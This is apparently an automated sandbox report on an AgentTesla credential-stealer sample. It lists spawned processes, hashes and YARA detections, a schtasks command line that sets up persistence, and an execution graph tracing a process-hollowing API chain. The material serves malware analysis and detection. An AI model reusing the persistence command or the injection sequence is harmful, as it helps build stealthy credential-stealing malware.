                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:8
                                                Start time:06:30:44
                                                Start date:27/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff66e660000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:9
                                                Start time:06:30:45
                                                Start date:27/05/2024
                                                Path:C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe"
                                                Imagebase:0x770000
                                                File size:708'096 bytes
                                                MD5 hash:B7DB10EC32FE6F53EE4A76E261761C27
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.4538007808.0000000002B4D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.4534288426.0000000000437000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.4534288426.0000000000437000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.4538007808.0000000002B24000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.4538007808.0000000002B24000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false

                                                General

                                                Target ID:10
                                                Start time:06:30:46
                                                Start date:27/05/2024
                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                Imagebase:0x7ff717f30000
                                                File size:496'640 bytes
                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:11
                                                Start time:06:30:47
                                                Start date:27/05/2024
                                                Path:C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe
                                                Imagebase:0x350000
                                                File size:708'096 bytes
                                                MD5 hash:B7DB10EC32FE6F53EE4A76E261761C27
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2167592562.0000000003B11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2167592562.0000000003B11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 63%, ReversingLabs
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:12
                                                Start time:06:30:48
                                                Start date:27/05/2024
                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XNYbGrcoFr" /XML "C:\Users\user\AppData\Local\Temp\tmpE0F1.tmp"
                                                Imagebase:0x8f0000
                                                File size:187'904 bytes
                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:13
                                                Start time:06:30:49
                                                Start date:27/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff66e660000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:14
                                                Start time:06:30:49
                                                Start date:27/05/2024
                                                Path:C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe"
                                                Imagebase:0x9f0000
                                                File size:708'096 bytes
                                                MD5 hash:B7DB10EC32FE6F53EE4A76E261761C27
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.4538569081.0000000003065000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.4538569081.0000000003065000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.4538569081.000000000308D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:12.3%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:241
                                                  Total number of Limit Nodes:15
                                                  execution_graph 33841 6a47eb4 33843 6a47f1c 33841->33843 33842 6a47e9a 33843->33842 33848 6a4a9a6 33843->33848 33865 6a4a940 33843->33865 33881 6a4a930 33843->33881 33844 6a47f90 33849 6a4a934 33848->33849 33850 6a4a9a9 33848->33850 33851 6a4a962 33849->33851 33897 6a4ae2e 33849->33897 33901 6a4b0ec 33849->33901 33905 6a4b2c7 33849->33905 33910 6a4b3a7 33849->33910 33914 6a4b305 33849->33914 33919 6a4b01b 33849->33919 33924 6a4b239 33849->33924 33929 6a4aede 33849->33929 33934 6a4af93 33849->33934 33939 6a4ad72 33849->33939 33943 6a4b035 33849->33943 33949 6a4b094 33849->33949 33953 6a4af29 33849->33953 33851->33844 33866 6a4a95a 33865->33866 33867 6a4b305 2 API calls 33866->33867 33868 6a4b3a7 2 API calls 33866->33868 33869 6a4b2c7 2 API calls 33866->33869 33870 6a4b0ec 2 API calls 33866->33870 33871 6a4ae2e 2 API calls 33866->33871 33872 6a4af29 2 API calls 33866->33872 33873 6a4a962 33866->33873 33874 6a4b094 2 API calls 33866->33874 33875 6a4b035 2 API calls 33866->33875 33876 6a4ad72 2 API calls 33866->33876 33877 6a4af93 2 API calls 33866->33877 33878 6a4aede 2 API calls 33866->33878 33879 6a4b239 2 API calls 33866->33879 33880 6a4b01b 2 API calls 33866->33880 33867->33873 33868->33873 33869->33873 33870->33873 33871->33873 33872->33873 33873->33844 33874->33873 33875->33873 33876->33873 33877->33873 33878->33873 33879->33873 33880->33873 33882 6a4a95a 33881->33882 33883 6a4b305 2 API calls 33882->33883 33884 6a4b3a7 2 API calls 33882->33884 33885 6a4b2c7 2 API calls 33882->33885 33886 6a4b0ec 2 API calls 33882->33886 33887 6a4ae2e 2 API calls 33882->33887 33888 6a4af29 2 API calls 33882->33888 33889 6a4b094 2 API calls 33882->33889 33890 6a4b035 2 API calls 33882->33890 33891 6a4a962 33882->33891 33892 6a4ad72 2 API calls 33882->33892 33893 6a4af93 2 API calls 33882->33893 33894 6a4aede 2 API calls 33882->33894 33895 6a4b239 2 API calls 33882->33895 33896 6a4b01b 2 API calls 33882->33896 33883->33891 33884->33891 33885->33891 33886->33891 33887->33891 33888->33891 33889->33891 33890->33891 33891->33844 33892->33891 33893->33891 33894->33891 33895->33891 33896->33891 33958 6a46d70 33897->33958 33962 6a46d68 33897->33962 33898 6a4ae4d 33967 6a47338 33901->33967 33971 6a47340 33901->33971 33902 6a4ae08 33902->33851 33906 6a4b27a 33905->33906 33906->33905 33907 6a4b5de 33906->33907 33975 6a47430 33906->33975 33979 6a47428 33906->33979 33983 6a47280 33910->33983 33987 6a47278 33910->33987 33911 6a4b3cd 33911->33851 33915 6a4b27a 33914->33915 33916 6a4b5de 33915->33916 33917 6a47430 ReadProcessMemory 33915->33917 33918 6a47428 ReadProcessMemory 33915->33918 33917->33915 33918->33915 33920 6a4aef5 33919->33920 33921 6a4af0a 33920->33921 33992 6a46cc0 33920->33992 33996 6a46cb8 33920->33996 33921->33851 33925 6a4b4c1 33924->33925 33927 6a46d70 Wow64SetThreadContext 33925->33927 33928 6a46d68 Wow64SetThreadContext 33925->33928 33926 6a4b414 33926->33851 33927->33926 33928->33926 33930 6a4aee4 33929->33930 33932 6a46cc0 ResumeThread 33930->33932 33933 6a46cb8 ResumeThread 33930->33933 33931 6a4af0a 33931->33851 33932->33931 33933->33931 33935 6a4af99 33934->33935 33937 6a47340 WriteProcessMemory 33935->33937 33938 6a47338 WriteProcessMemory 33935->33938 33936 6a4afce 33937->33936 33938->33936 34000 6a479bc 33939->34000 34005 6a479c8 33939->34005 33944 6a4b042 33943->33944 33945 6a4afaa 33943->33945 33947 6a47340 WriteProcessMemory 33945->33947 33948 6a47338 WriteProcessMemory 33945->33948 33946 6a4afce 33947->33946 33948->33946 33950 6a4b0ca 33949->33950 33951 6a47340 WriteProcessMemory 33949->33951 33952 6a47338 WriteProcessMemory 33949->33952 33951->33950 33952->33950 33954 6a4af4c 33953->33954 33956 6a47340 WriteProcessMemory 33954->33956 33957 6a47338 WriteProcessMemory 33954->33957 33955 6a4b0ca 33956->33955 33957->33955 33959 6a46db5 Wow64SetThreadContext 33958->33959 33961 6a46dfd 33959->33961 33961->33898 33963 6a46d5b 33962->33963 33964 6a46d6f Wow64SetThreadContext 33962->33964 33963->33898 33966 6a46dfd 33964->33966 33966->33898 33968 6a47388 WriteProcessMemory 33967->33968 33970 6a473df 33968->33970 33970->33902 33972 6a47388 WriteProcessMemory 33971->33972 33974 6a473df 33972->33974 33974->33902 33976 6a4747b ReadProcessMemory 33975->33976 33978 6a474bf 33976->33978 33978->33906 33980 6a4741b 33979->33980 33980->33979 33981 6a4748e ReadProcessMemory 33980->33981 33982 6a474bf 33981->33982 33982->33906 33984 6a472c0 VirtualAllocEx 33983->33984 33986 6a472fd 33984->33986 33986->33911 33988 6a4727d 33987->33988 33989 6a4726b 33988->33989 33990 6a472ca VirtualAllocEx 33988->33990 33989->33911 33991 6a472fd 33990->33991 33991->33911 33993 6a46d00 ResumeThread 33992->33993 33995 6a46d31 33993->33995 33995->33921 33997 6a46d00 ResumeThread 33996->33997 33999 6a46d31 33997->33999 33999->33921 34001 6a479b3 34000->34001 34002 6a479c7 CreateProcessA 34000->34002 34004 6a47c13 34002->34004 34004->34004 34006 6a47a51 CreateProcessA 34005->34006 34008 6a47c13 34006->34008 34008->34008 33788 4b21cf0 33789 4b21d58 CreateWindowExW 33788->33789 33791 4b21e14 33789->33791 33792 6a4bb20 33793 6a4bcab 33792->33793 33795 6a4bb46 33792->33795 33795->33793 33796 6a476d0 33795->33796 33797 6a4bda0 PostMessageW 33796->33797 33798 6a4be0c 33797->33798 33798->33795 33799 bfd0b8 33800 bfd0fe GetCurrentProcess 33799->33800 33802 bfd149 33800->33802 33803 bfd150 GetCurrentThread 33800->33803 33802->33803 33804 bfd18d GetCurrentProcess 33803->33804 33805 bfd186 33803->33805 33806 bfd1c3 33804->33806 33805->33804 33807 bfd1eb GetCurrentThreadId 33806->33807 33808 bfd21c 33807->33808 33809 bfad38 33813 bfae21 33809->33813 33821 bfae30 33809->33821 33810 bfad47 33814 bfae41 33813->33814 33815 bfae64 33813->33815 33814->33815 33829 bfb0b8 33814->33829 33833 bfb0c8 33814->33833 33815->33810 33816 bfae5c 33816->33815 33817 bfb068 GetModuleHandleW 33816->33817 33818 bfb095 33817->33818 33818->33810 33822 bfae41 33821->33822 33823 bfae64 33821->33823 33822->33823 33827 bfb0b8 LoadLibraryExW 33822->33827 33828 bfb0c8 LoadLibraryExW 33822->33828 33823->33810 33824 bfae5c 33824->33823 33825 bfb068 GetModuleHandleW 33824->33825 33826 bfb095 33825->33826 33826->33810 33827->33824 33828->33824 33830 bfb0dc 33829->33830 33831 bfb101 33830->33831 33837 bfa870 33830->33837 33831->33816 33834 bfb0dc 33833->33834 33835 bfb101 33834->33835 33836 bfa870 LoadLibraryExW 33834->33836 33835->33816 33836->33835 33838 bfb2a8 LoadLibraryExW 33837->33838 33840 bfb321 33838->33840 33840->33831 34009 bf4668 34010 bf467a 34009->34010 34011 bf4686 34010->34011 34013 bf4779 34010->34013 34014 bf479d 34013->34014 34018 bf4888 34014->34018 34022 bf4878 34014->34022 34019 bf48af 34018->34019 34021 bf498c 34019->34021 34026 bf449c 34019->34026 34024 bf48af 34022->34024 34023 bf498c 34023->34023 34024->34023 34025 bf449c CreateActCtxA 34024->34025 34025->34023 34027 bf5918 CreateActCtxA 34026->34027 34029 bf59db 34027->34029 34029->34029 34030 b7d01c 34031 b7d034 34030->34031 34032 b7d08e 34031->34032 34037 4b20ad4 34031->34037 34046 4b21e98 34031->34046 34050 4b21ea8 34031->34050 34054 4b22c08 34031->34054 34038 4b20adf 34037->34038 34039 4b22c79 34038->34039 34041 4b22c69 34038->34041 34079 4b20bfc 34039->34079 34063 4b22da0 34041->34063 34068 4b22e6c 34041->34068 34074 4b22d91 34041->34074 34042 4b22c77 34047 4b21ece 34046->34047 34048 4b20ad4 CallWindowProcW 34047->34048 34049 4b21eef 34048->34049 34049->34032 34051 4b21ece 34050->34051 34052 4b20ad4 CallWindowProcW 34051->34052 34053 4b21eef 34052->34053 34053->34032 34055 4b22c45 34054->34055 34056 4b22c79 34055->34056 34058 4b22c69 34055->34058 34057 4b20bfc CallWindowProcW 34056->34057 34059 4b22c77 34057->34059 34060 4b22da0 CallWindowProcW 34058->34060 34061 4b22d91 CallWindowProcW 34058->34061 34062 4b22e6c CallWindowProcW 34058->34062 34060->34059 34061->34059 34062->34059 34065 4b22db4 34063->34065 34064 4b22e40 34064->34042 34083 4b22e47 34065->34083 34086 4b22e58 34065->34086 34069 4b22e2a 34068->34069 34070 4b22e7a 34068->34070 34072 4b22e47 CallWindowProcW 34069->34072 34073 4b22e58 CallWindowProcW 34069->34073 34071 4b22e40 34071->34042 34072->34071 34073->34071 34075 4b22db4 34074->34075 34077 4b22e47 CallWindowProcW 34075->34077 34078 4b22e58 CallWindowProcW 34075->34078 34076 4b22e40 34076->34042 34077->34076 34078->34076 34080 4b20c07 34079->34080 34081 4b2435a CallWindowProcW 34080->34081 34082 4b24309 34080->34082 34081->34082 34082->34042 34084 4b22e69 34083->34084 34089 4b24280 34083->34089 34084->34064 34087 4b22e69 34086->34087 34088 4b24280 CallWindowProcW 34086->34088 34087->34064 34088->34087 34090 4b20bfc CallWindowProcW 34089->34090 34091 4b242aa 34090->34091 34091->34084 34092 bfd300 DuplicateHandle 34093 bfd396 34092->34093

                                                  Executed Functions

                                                  Function 04B271B0 Relevance: .8, Instructions: 814COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2129060307.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_4b20000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b89d78672916e3f9f152f125738f4766f21a59c2b3145325b04b8471e1a1c872
                                                  • Instruction ID: 849feda3e50a803913ef95f97f169df380dafb23ab908dc1cef4a51a6eb7a1bc
                                                  • Opcode Fuzzy Hash: b89d78672916e3f9f152f125738f4766f21a59c2b3145325b04b8471e1a1c872
                                                  • Instruction Fuzzy Hash: AE82B334A01228CFDB54DF64C994B99B7B2FF8A304F1185E9D509AB365DB30AE85CF41
                                                  Function 06A4C590 Relevance: .3, Instructions: 341COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2131344151.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6a40000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8b60a0cbe9b4c65561b0e186d01e4d30b76ed68129ac1d68f8e777fd5e6f3f9f
                                                  • Instruction ID: c9cb312cc9804d4a3a283884bbbd44af2a7b50d0369926f53f64004fb5e2ece6
                                                  • Opcode Fuzzy Hash: 8b60a0cbe9b4c65561b0e186d01e4d30b76ed68129ac1d68f8e777fd5e6f3f9f
                                                  • Instruction Fuzzy Hash: 50C19971B016048FE799EB75C920B6EB7E6AFC9700F1484ADD24A9B391CF35E805CB52
                                                  Function 06A4AEAA Relevance: .0, Instructions: 21COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2131344151.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6a40000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 999b1a715eab26c3f9c4df609f8757f09a985ceb922d7ce1c7f89a2099437fa4
                                                  • Instruction ID: fcdf5cf09a43658799183b0781e162e6c103f52c7f9e73737e5c660b723c2ea2
                                                  • Opcode Fuzzy Hash: 999b1a715eab26c3f9c4df609f8757f09a985ceb922d7ce1c7f89a2099437fa4
                                                  • Instruction Fuzzy Hash: 51E08674C4F690CFD781FB745D445F0BF78AB87201B0920EE8108AF257C628C805C765
                                                  Function 00BFD0A8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 00BFD136
                                                  • GetCurrentThread.KERNEL32 ref: 00BFD173
                                                  • GetCurrentProcess.KERNEL32 ref: 00BFD1B0
                                                  • GetCurrentThreadId.KERNEL32 ref: 00BFD209
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2122753782.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_bf0000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID: px]/
                                                  • API String ID: 2063062207-3026016296
                                                  • Opcode ID: 076025375e827d502d925cf057dfe0878c7e3ccd715ddadd6961fb8b5870a14b
                                                  • Instruction ID: 93372d5d64d9e817c3a05c7dfda7b8f6b82f48dd673709d2c7b7e51ce010e915
                                                  • Opcode Fuzzy Hash: 076025375e827d502d925cf057dfe0878c7e3ccd715ddadd6961fb8b5870a14b
                                                  • Instruction Fuzzy Hash: 2F5189B09013498FDB44DFA9D548BEEBFF1EF88314F208099E108A7360DB789949CB61
                                                  Function 00BFD0B8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 00BFD136
                                                  • GetCurrentThread.KERNEL32 ref: 00BFD173
                                                  • GetCurrentProcess.KERNEL32 ref: 00BFD1B0
                                                  • GetCurrentThreadId.KERNEL32 ref: 00BFD209
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2122753782.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_bf0000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID: px]/
                                                  • API String ID: 2063062207-3026016296
                                                  • Opcode ID: 415c598dbba0d22fb416e792b42c8cf730b58efa28366375741014a8dfc511aa
                                                  • Instruction ID: d181f967df4a9134d10e24f78924b7f3f1c8a00c8bd30e521a045aa93678b03d
                                                  • Opcode Fuzzy Hash: 415c598dbba0d22fb416e792b42c8cf730b58efa28366375741014a8dfc511aa
                                                  • Instruction Fuzzy Hash: 2E5159B09013098FDB54DFA9D548BAEBBF1EF88314F208459E509B7350DB78A944CB65
                                                  Function 06A479BC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 252processCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 44 6a479bc-6a479c5 45 6a479c7-6a47a5d 44->45 46 6a479b3 44->46 48 6a47a96-6a47ab6 45->48 49 6a47a5f-6a47a69 45->49 56 6a47aef-6a47b1e 48->56 57 6a47ab8-6a47ac2 48->57 49->48 50 6a47a6b-6a47a6d 49->50 51 6a47a90-6a47a93 50->51 52 6a47a6f-6a47a79 50->52 51->48 54 6a47a7d-6a47a8c 52->54 55 6a47a7b 52->55 54->54 58 6a47a8e 54->58 55->54 63 6a47b57-6a47c11 CreateProcessA 56->63 64 6a47b20-6a47b2a 56->64 57->56 59 6a47ac4-6a47ac6 57->59 58->51 61 6a47ac8-6a47ad2 59->61 62 6a47ae9-6a47aec 59->62 65 6a47ad4 61->65 66 6a47ad6-6a47ae5 61->66 62->56 77 6a47c13-6a47c19 63->77 78 6a47c1a-6a47ca0 63->78 64->63 68 6a47b2c-6a47b2e 64->68 65->66 66->66 67 6a47ae7 66->67 67->62 69 6a47b30-6a47b3a 68->69 70 6a47b51-6a47b54 68->70 72 6a47b3c 69->72 73 6a47b3e-6a47b4d 69->73 70->63 72->73 73->73 75 6a47b4f 73->75 75->70 77->78 88 6a47cb0-6a47cb4 78->88 89 6a47ca2-6a47ca6 78->89 90 6a47cc4-6a47cc8 88->90 91 6a47cb6-6a47cba 88->91 89->88 92 6a47ca8 89->92 94 6a47cd8-6a47cdc 90->94 95 6a47cca-6a47cce 90->95 91->90 93 6a47cbc 91->93 92->88 93->90 97 6a47cee-6a47cf5 94->97 98 6a47cde-6a47ce4 94->98 95->94 96 6a47cd0 95->96 96->94 99 6a47cf7-6a47d06 97->99 100 6a47d0c 97->100 98->97 99->100 101 6a47d0d 100->101 101->101
                                                  APIs
                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06A47BFE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2131344151.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6a40000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID: px]/$px]/
                                                  • API String ID: 963392458-2092919866
                                                  • Opcode ID: 2d1f76c8beef44675ce1b5af10ec6e9b8b78dd5fb1defa583ff711f3068c0383
                                                  • Instruction ID: 6e4552a20a2e0a35df033c0e94f2196bfd01ad9c5b045b5ce67d67dbc7d8a41f
                                                  • Opcode Fuzzy Hash: 2d1f76c8beef44675ce1b5af10ec6e9b8b78dd5fb1defa583ff711f3068c0383
                                                  • Instruction Fuzzy Hash: B8A14B71D002599FEB64EF68CC417EEBBB2FF84314F1485A9E809A7240DB749A85CF91
                                                  Function 06A479C8 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243processCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 103 6a479c8-6a47a5d 105 6a47a96-6a47ab6 103->105 106 6a47a5f-6a47a69 103->106 113 6a47aef-6a47b1e 105->113 114 6a47ab8-6a47ac2 105->114 106->105 107 6a47a6b-6a47a6d 106->107 108 6a47a90-6a47a93 107->108 109 6a47a6f-6a47a79 107->109 108->105 111 6a47a7d-6a47a8c 109->111 112 6a47a7b 109->112 111->111 115 6a47a8e 111->115 112->111 120 6a47b57-6a47c11 CreateProcessA 113->120 121 6a47b20-6a47b2a 113->121 114->113 116 6a47ac4-6a47ac6 114->116 115->108 118 6a47ac8-6a47ad2 116->118 119 6a47ae9-6a47aec 116->119 122 6a47ad4 118->122 123 6a47ad6-6a47ae5 118->123 119->113 134 6a47c13-6a47c19 120->134 135 6a47c1a-6a47ca0 120->135 121->120 125 6a47b2c-6a47b2e 121->125 122->123 123->123 124 6a47ae7 123->124 124->119 126 6a47b30-6a47b3a 125->126 127 6a47b51-6a47b54 125->127 129 6a47b3c 126->129 130 6a47b3e-6a47b4d 126->130 127->120 129->130 130->130 132 6a47b4f 130->132 132->127 134->135 145 6a47cb0-6a47cb4 135->145 146 6a47ca2-6a47ca6 135->146 147 6a47cc4-6a47cc8 145->147 148 6a47cb6-6a47cba 145->148 146->145 149 6a47ca8 146->149 151 6a47cd8-6a47cdc 147->151 152 6a47cca-6a47cce 147->152 148->147 150 6a47cbc 148->150 149->145 150->147 154 6a47cee-6a47cf5 151->154 155 6a47cde-6a47ce4 151->155 152->151 153 6a47cd0 152->153 153->151 156 6a47cf7-6a47d06 154->156 157 6a47d0c 154->157 155->154 156->157 158 6a47d0d 157->158 158->158
                                                  APIs
                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06A47BFE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2131344151.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6a40000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID: px]/$px]/
                                                  • API String ID: 963392458-2092919866
                                                  • Opcode ID: 4410357562d363256155004e0fe04e4ef3c79f2fa795188d8980b3d9474ee1b9
                                                  • Instruction ID: 302a5d6026378d03fa6c075082f215e3bf5623325856d7a456bb13715a2a76a5
                                                  • Opcode Fuzzy Hash: 4410357562d363256155004e0fe04e4ef3c79f2fa795188d8980b3d9474ee1b9
                                                  • Instruction Fuzzy Hash: 2B916C71D00259CFEB64EF68CC417AEBBB2FF84310F1485A9E809A7240DB749985CF91
                                                  Function 04B21CE5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 160 4b21ce5-4b21d56 161 4b21d61-4b21d68 160->161 162 4b21d58-4b21d5e 160->162 163 4b21d73-4b21dab 161->163 164 4b21d6a-4b21d70 161->164 162->161 165 4b21db3-4b21e12 CreateWindowExW 163->165 164->163 166 4b21e14-4b21e1a 165->166 167 4b21e1b-4b21e53 165->167 166->167 171 4b21e60 167->171 172 4b21e55-4b21e58 167->172 173 4b21e61 171->173 172->171 173->173
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04B21E02
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2129060307.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_4b20000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID: px]/$px]/
                                                  • API String ID: 716092398-2092919866
                                                  • Opcode ID: fa4618118b0e7ea399f448bec44360029401966fa2849abac51ba8827ca72fbd
                                                  • Instruction ID: 62abb507b7fb52f751e9ae80b861e2d0cab06288fac3ff849dd6872a8c222061
                                                  • Opcode Fuzzy Hash: fa4618118b0e7ea399f448bec44360029401966fa2849abac51ba8827ca72fbd
                                                  • Instruction Fuzzy Hash: E951CFB1D003599FDB14CF99D984ADEBFB5FF48310F24866AE818AB210D770A845CF90
                                                  Function 04B21CF0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 174 4b21cf0-4b21d56 175 4b21d61-4b21d68 174->175 176 4b21d58-4b21d5e 174->176 177 4b21d73-4b21e12 CreateWindowExW 175->177 178 4b21d6a-4b21d70 175->178 176->175 180 4b21e14-4b21e1a 177->180 181 4b21e1b-4b21e53 177->181 178->177 180->181 185 4b21e60 181->185 186 4b21e55-4b21e58 181->186 187 4b21e61 185->187 186->185 187->187
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04B21E02
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2129060307.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_4b20000_GestorRemesasCONFIRMIMING.jbxd
